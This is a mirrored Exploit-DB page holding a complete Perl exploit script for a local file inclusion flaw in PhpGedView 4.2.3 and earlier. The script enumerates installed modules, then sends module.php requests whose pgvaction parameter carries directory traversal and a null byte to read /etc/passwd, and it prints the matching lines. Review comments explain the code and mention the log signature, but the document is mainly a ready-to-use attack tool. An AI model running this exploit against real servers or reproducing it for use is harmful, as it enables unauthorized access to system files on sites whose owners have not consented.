PhpGedView 4.2.3 – Local File Inclusion

  • 作者: dun
    日期: 2011-01-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15913/
  • #!/usr/bin/perl -w
     
    #:::::::-. ...::::::.:::.
    # ;;, `';, ;; ;;;`;;;;,`;;;
    # `[[ [[[[' [[[[[[[[. '[[
    #$$,$$$$$$$$$$ "Y$c$$
    #888_,o8P'88.d888888Y88
    #MMMMP"` "YmmMMMM""MMM YM
    #[ Discovered by dun \ posdub[at]gmail.com ]
    #
    ##################################################################
    #[ PhpGedView <= 4.2.3 ]Local File Inclusion Vulnerability #
    ##################################################################
    #
    # Script: "PhpGedView is a revolutionary genealogy program which
    #allows you to view and edit your genealogy on your website..."
    #
    # Script: http://www.phpgedview.net/
    # Download: http://sourceforge.net/projects/phpgedview/
    #
    # Usage: perl expl.pl http://site.com/phpgedview/
    #
    ##################################################################
    #[ dun / 2011-01-05 ]
    
    use IO::Socket;
    use Socket;
    use IO::Select;
    
    
    my @modules;

    # A single argument is required: the base URL of the PhpGedView install.
    unless (@ARGV) {
        print "\nUsage: perl expl.pl http://site.com/phpgedview/\n\n";
        exit;
    }

    my $base_url = $ARGV[0];

    # Step 1: build the module list (from the /modules/ listing when the web
    # server exposes one, else the built-in default list).
    print "\033[32m[1] \033[0mChecking installed PGV modules..\n";
    @modules = get_modules_list("$base_url/modules/");

    # Step 2: try each module name against the target file.
    print "\033[32m[2] \033[0mTrying to read /etc/passwd file..\n";
    p(\@modules, "$base_url/", '/etc/passwd');
    
    # http_query(URL [, HOST, PORT])
    #
    # Sends one HTTP/1.0 GET with "Connection: Close" and returns the whole raw
    # response (status line, headers and body) as a single string.  Returns
    # nothing (undef in scalar context) when the TCP connection cannot be
    # opened within the 3-second connect timeout.  Two call forms:
    #   http_query($url)                - URL is parsed here: "http://" is
    #                                     stripped, the host is the run of
    #                                     letters/digits/dots in front of the
    #                                     first "/", port is 80, and a Host:
    #                                     header is sent.
    #   http_query($path, $host, $port) - $path is used verbatim as the request
    #                                     target and no Host: header is sent.
    # NOTE(review): $host, $port, $get and $query are package globals (no "my";
    # the file has no "use strict"), so they keep their values after the call.
    sub http_query {
    
     my $page="";
     my $url=$_[0];
     # Fixed User-Agent on every request; a stable string for log review.
     my $ua="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)";
    if(defined($_[1]) && defined($_[2])) {
     $host=$_[1];
     $port=$_[2];
     $get="GET $url HTTP/1.0\r\n$ua\r\nConnection: Close\r\n\r\n";
    } else {
     $port=80;
     $url=~s/http:\/\///;
     $host=$url;
     $query=$url;
     # Drop the path: the first "name/..." tail collapses to "name", so what is
     # left is used as the host.
     $host=~s/([a-zA-Z0-9\.]+)\/.*/$1/;
     # NOTE(review): $host is interpolated into the pattern unescaped, so each
     # "." in it matches any character (quotemeta would make it literal).
     $query=~s/$host//;
     if ($query eq "") {$query="/";};
    
     $get="GET $query HTTP/1.0\r\nHost: $host\r\n$ua\r\nConnection: Close\r\n\r\n";
    }
     # Timeout covers connect() only; the read below runs until the server
     # closes the connection.  A failed connect returns without a value.
     my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"$port",Proto=>"tcp",Timeout => 3) or return;
     print $sock $get;   # the return value of print is not checked
     my @r = <$sock>;
     # "@r" joins the lines with $" (a single space), so every response line
     # after the first starts with an extra space in the returned string.
     $page="@r";
     close($sock);
     
     return $page;
    }
    
    # get_modules_list(LISTING_URL)
    #
    # Fetches LISTING_URL and returns the names of the sub-directory links
    # ("<a href="name/">") found in it.  When the page yields no such links
    # (directory listing disabled, connection failed, ...), a fixed default
    # list of known PhpGedView module names is returned instead.  Prints a
    # one-line summary in either case.
    sub get_modules_list {
        my ($listing_url) = @_;

        # Default module names, used only when the listing yields nothing.
        my @fallback = qw(
            FCKeditor GEDFact_assistant JWplayer batch_update cms_interface
            gallery2 googlemap lightbox punbb research_assistant sitemap
            slideshow wordsearch
        );

        my $listing = http_query($listing_url);

        # Collect every "<a href="name/">" sub-directory link in the listing;
        # $4 is the directory name without its trailing slash.
        my @found;
        while ($listing =~ m/(.*)<(a|A)\s(href|HREF)="([^\/]+)\/">/g) {
            push @found, $4;
        }

        if (@found) {
            print " Installed modules: @found\n";
            return @found;
        }

        print " No info about installed modules..\n";
        return @fallback;
    }
    
    # p(\@module_names, $base_url, $file)
    #
    # Tries each module name in turn: requests module.php with "mod=<name>" and
    # a "pgvaction" value that walks up ten directories to $file and ends in an
    # encoded NUL (%00).  A response counts as a hit when it contains a
    # passwd-style line (name:x:uid:gid:gecos:/home:/shell); the matching lines
    # are printed after the user presses ENTER, and the sub returns 0 at the
    # first hit.  When no module produces a hit, "Failed" is printed and the
    # value of that print is the implicit return value.
    # For log review, the telltale of this request is the "pgvaction="
    # parameter carrying repeated "/.." segments and a trailing "%00".
    # NOTE(review): $r, $q and @lines are package globals (no "my").
    sub p {
     my($mods, $host, $file)=@_;
     my $page="";
     foreach $r(@{$mods}) {
    	# Request URL for this module; ("/.." x 10) is the traversal prefix.
    	$q="$host"."module.php?mod=$r&pgvaction=".("/.."x10)."$file%00";
    	$page=http_query($q);
    	# http_query joins response lines with a space, so elements after the
    	# first carry a leading space; the regex below still matches them.
    	@lines = split (/\n/, $page);
    	# Hit test: any line shaped like an /etc/passwd entry.
    	if($page=~ m/(.+):.:\d+:\d+:(.*):\/(.+):\/(.*)/g){
    	 print "\033[32mModule: $r\n";
    	 print "Adress: $q\n";
    	 # The message names /etc/passwd regardless of what $file holds.
    	 print "File: /etc/passwd:\033[0m (Press ENTER) ";
    	 # Wait for a line on STDIN; only EOF (undef) skips the dump.
    	 if(<STDIN>) {
    	 print "\n\n";
    	# Echo only the lines that look like passwd entries.
    	for(@lines) {
    	 if($_=~ m/(.+):.:\d+:\d+:(.*):\/(.+):\/(.*)/g){
    		print $_."\n";			
    	 }
    }
    	 }
    	# Stop after the first module that works.
    	return 0;
    	}
     }
     # No module produced a hit; this print's result is the implicit return.
     print "\033[31mFailed :(\033[0m\n"
    }
    
    ##################################################################